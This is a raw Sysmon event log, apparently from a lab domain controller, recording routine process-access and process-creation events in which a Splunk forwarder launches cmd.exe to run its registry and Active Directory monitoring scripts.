13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4401-000000009101}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4401-000000009101}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.386{10ACEC4A-85ED-5FCF-4401-000000009101}2756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4301-000000009101}4760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4301-000000009101}4760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.275{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4301-000000009101}4760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.276{10ACEC4A-85ED-5FCF-4301-000000009101}4760C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4201-000000009101}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 